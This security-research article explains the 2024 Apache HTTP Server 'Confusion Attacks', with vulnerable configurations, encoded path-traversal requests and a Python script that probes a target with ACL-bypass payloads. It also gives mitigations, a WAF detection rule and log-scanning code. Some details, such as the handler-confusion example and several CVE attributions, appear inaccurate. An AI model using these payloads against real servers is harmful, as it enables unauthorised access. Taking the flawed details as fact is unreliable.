Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server
Wed May 27 2026
Category: Security Research
Introduction: #1 Web Hacking Technique of 2024
Security researcher Orange Tsai presented one of the most impactful discoveries of 2024 at Black Hat USA: Confusion Attacks — a new class of vulnerabilities targeting the semantic inconsistencies hidden inside Apache HTTP Server's module pipeline.
The research ranked #1 on PortSwigger's "Top 10 Web Hacking Techniques of 2024" list and resulted in 6 CVEs (CVE-2024-38472 through CVE-2024-38477).
The Core Problem: Semantic Ambiguity
Apache HTTP Server is composed of multiple modules: mod_rewrite, mod_proxy, mod_authz_core, mod_cgi, and others. Each module processes an HTTP request at a different point in the pipeline.
The problem: different modules can interpret the same URL differently.
Classic example: the %2F character (URL-encoded /).
mod_authz_core (ACL check) receives the raw URL: /api%2F../admin → doesn't match the /admin rule → ALLOW
mod_rewrite processes the same URL and decodes it: %2F → / → /api/../admin → /admin → forwarded to backend
The ACL sees a "safe" path, while the backend handler receives the real, decoded path. This gap is the attack surface.
Three Confusion Types
1. Filename Confusion — CVE-2024-38474 / CVE-2024-38473
mod_rewrite does not normalize the URL before the ACL check. The ACL decides on the raw URL; mod_rewrite decodes it afterward.
Vulnerable configuration:
<Location "/admin">
Require ip 192.168.1.0/24
</Location>
RewriteEngine On
RewriteRule "^/api/(.+)$" "/var/www/api/$1" [L]
Attack request:
GET /api%2F../admin/panel HTTP/1.1
Host: target.com
Step 1 — ACL: /api%2F../admin/panel → doesn't match /admin rule → PASS
Step 2 — mod_rewrite: decodes %2F → / → /api/../admin/panel → /admin/panel → forwarded to backend
Result: Protected resource is exposed, or RCE is triggered.
2. DocumentRoot Confusion — CVE-2024-38476 / CVE-2024-38472
In reverse proxy configurations (ProxyPass), Apache's path interpretation can cause an encoded request to reach a backend that should have been blocked.
Vulnerable configuration:
ProxyPass "/app" "http://internal-backend:8080/app"
<Location "/app/admin">
Require all denied
</Location>
Attack request:
GET /app%2F..%2Fadmin/config HTTP/1.1
The ACL doesn't match /app/admin (characters are still encoded). ProxyPass decodes the path and forwards /admin/config to the backend. The backend serves the restricted resource.
This technique enables SSRF to internal services, unauthorized file reads, and backend RCE.
3. Handler Confusion — CVE-2024-38475 / CVE-2024-38477
mod_rewrite routes a request to the wrong handler. If that handler is mod_cgi or mod_php, the file is executed.
Vulnerable configuration:
RewriteEngine On
RewriteRule "^/static/(.+\.gif)$" "/var/www/static/$1" [L]
AddHandler cgi-script .cgi
Attack request:
GET /static/../../cgi-bin/shell.cgi HTTP/1.1
If the rewrite rule processes without strict path enforcement, the path normalizes to /cgi-bin/shell.cgi, which is then executed by the CGI handler — direct RCE.
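All three confusion types above come from one ordering problem: the ACL decides on the raw request string, and decoding plus normalization happen later. The following is an added example, not code from the original post or from DEVCORE: a constructed model of that ordering beside a hardened one, run over the three requests shown above. DENY_PREFIXES, HANDLERS and the function names are assumptions for the model, not Apache internals.

```python
from urllib.parse import unquote
import posixpath

# Constructed model of the evaluation order the article describes; it is not
# Apache's own code. The protected prefixes and handler map are assumptions.
DENY_PREFIXES = ("/admin", "/app/admin", "/cgi-bin")
HANDLERS = {".cgi": "cgi-script", ".php": "php"}

def acl_allows(path):
    """<Location>-style prefix ACL, evaluated on whatever string it is handed."""
    return not any(path == p or path.startswith(p + "/") for p in DENY_PREFIXES)

def decode_and_normalize(raw):
    """What the later module (mod_rewrite / mod_proxy) effectively does: decode, then collapse '..'."""
    return posixpath.normpath(unquote(raw))

def handler_for(path):
    """AddHandler-style selection by the extension of the final path."""
    return HANDLERS.get(posixpath.splitext(path)[1], "default")

def vulnerable_pipeline(raw):
    """Confused order: ACL on the raw request URI, decoding afterwards."""
    if not acl_allows(raw):
        return ("denied", None, None)
    final = decode_and_normalize(raw)
    return ("allowed", final, handler_for(final))

def hardened_pipeline(raw):
    """Refuse encoded slashes (the effect of AllowEncodedSlashes Off, the default;
    NoDecode instead keeps them literal) and run the ACL on the normalized path."""
    if "%2f" in raw.lower():
        return ("denied", None, None)
    final = decode_and_normalize(raw)
    if not acl_allows(final):
        return ("denied", final, None)
    return ("allowed", final, handler_for(final))

def compare(raw):
    """(decision under the confused order, decision under the hardened order)."""
    return vulnerable_pipeline(raw), hardened_pipeline(raw)

if __name__ == "__main__":
    for req in ("/api/users", "/api%2F../admin/panel",
                "/app%2F..%2Fadmin/config", "/static/../../cgi-bin/shell.cgi"):
        print(req, "->", compare(req))
```

The point to take from the output is that the two orders agree on ordinary requests and disagree exactly on the three requests the article walks through.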
Attack Chain Visualized
PoC — Encoded Path Bypass Test
import requests

TARGET = "http://target.com"

# Filename Confusion PoC: each payload encodes part of the traversal so the
# ACL sees one path and the decoding module sees another
payloads = [
    "/api%2F../admin/config",      # %2F bypass
    "/api%2e%2e/admin/config",     # %2E%2E bypass
    "/api/..%2Fadmin/config",      # mixed encoding
    "/api/%2e%2e/admin/config",    # double-dot encoded
]

for payload in payloads:
    r = requests.get(TARGET + payload, allow_redirects=False)
    status = "[!] BYPASS" if r.status_code == 200 else "    blocked"
    print(f"{status}: {payload} → {r.status_code}")
Affected Versions
- Apache HTTP Server 2.4.0 through 2.4.59
- mod_rewrite, mod_proxy, or mod_cgi must be active
- Fixed in: Apache 2.4.60 (July 2024)
Detection and Mitigation
1. Update Apache to 2.4.60 or later.
2. Disable encoded slash decoding:
AllowEncodedSlashes NoDecode
3. Avoid the [NE] flag (no-escape) in RewriteRule directives — it forces decoding.
4. WAF rules should check both encoded and decoded forms:
SecRule REQUEST_URI "@rx (?i)(%2f|%2e%2e|/\.\.)" \
"id:1001,deny,msg:'Encoded Path Traversal'"
5. Add a normalizing layer in front of the reverse proxy (e.g., Nginx with merge_slashes on).
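The same encoded-and-decoded check that item 4 asks of the WAF can be run retrospectively over access logs. The following is an added example, not code from the original post or from DEVCORE: it parses constructed Apache combined-format log lines, flags request paths whose decoded form differs in a slash or dot-dot segment (including double encoding), and ranks a hit higher when the normalized target lands in a protected tree and the server answered 200. SAMPLE_LOG, PROTECTED and the severity rule are assumptions.

```python
import re
from urllib.parse import unquote
import posixpath

# Constructed access-log lines (Apache combined format); not from any real host.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Jul/2024:10:00:01 +0000] "GET /api/users HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.5 - - [20/Jul/2024:10:00:02 +0000] "GET /api%2F../admin/config HTTP/1.1" 200 812 "-" "curl/8.0"
203.0.113.9 - - [20/Jul/2024:10:00:03 +0000] "GET /app%2F..%2Fadmin/config HTTP/1.1" 403 199 "-" "curl/8.0"
203.0.113.9 - - [20/Jul/2024:10:00:04 +0000] "GET /api/%252e%252e/admin/config HTTP/1.1" 404 150 "-" "curl/8.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')
PROTECTED = ("/admin", "/app/admin", "/cgi-bin")  # assumed ACL-protected trees

def classify_uri(raw_uri):
    """Reasons a request path looks like an encoding-confusion probe (empty list if none)."""
    path = raw_uri.split("?", 1)[0]
    once = unquote(path)      # what a single decoding module would see
    twice = unquote(once)     # catches %252f / %252e double encoding
    reasons = []
    if "%2f" in path.lower():
        reasons.append("encoded slash")
    if "%2e" in path.lower():
        reasons.append("encoded dot")
    if "/../" in once + "/" or "/../" in twice + "/":
        reasons.append("dot-dot segment after decoding")
    if twice != once:
        reasons.append("double encoding")
    return reasons

def normalized_target(raw_uri):
    """The path a fully decoding backend would end up serving."""
    return posixpath.normpath(unquote(unquote(raw_uri.split("?", 1)[0])))

def scan_log(text):
    """Return one finding dict per suspicious line, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_uri(m["uri"])
        if not reasons:
            continue
        target = normalized_target(m["uri"])
        protected = any(target == p or target.startswith(p + "/") for p in PROTECTED)
        severity = "high" if protected and m["status"] == "200" else "medium"
        findings.append({"ip": m["ip"], "uri": m["uri"], "status": m["status"],
                         "target": target, "severity": severity, "reasons": reasons})
    return findings
```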
Conclusion
Confusion Attacks define a new vulnerability class that doesn't arise from a single module bug — it emerges from inter-module inconsistency. Security analysis of individual modules is insufficient; the interactions between modules must be modeled as part of the threat surface.
Orange Tsai's research demonstrated that a 20-year-old software stack running on millions of production servers can still harbor entire classes of undiscovered vulnerabilities. The lesson: trust boundaries between framework layers are attack surface.
CVEs: CVE-2024-38472, CVE-2024-38473, CVE-2024-38474, CVE-2024-38475, CVE-2024-38476, CVE-2024-38477
Disclosure: July 2024
Researcher: Orange Tsai / DEVCORE Research
Conference: Black Hat USA 2024
Reference: https://blog.orange.tw/posts/2024-08-confusion-attacks-en/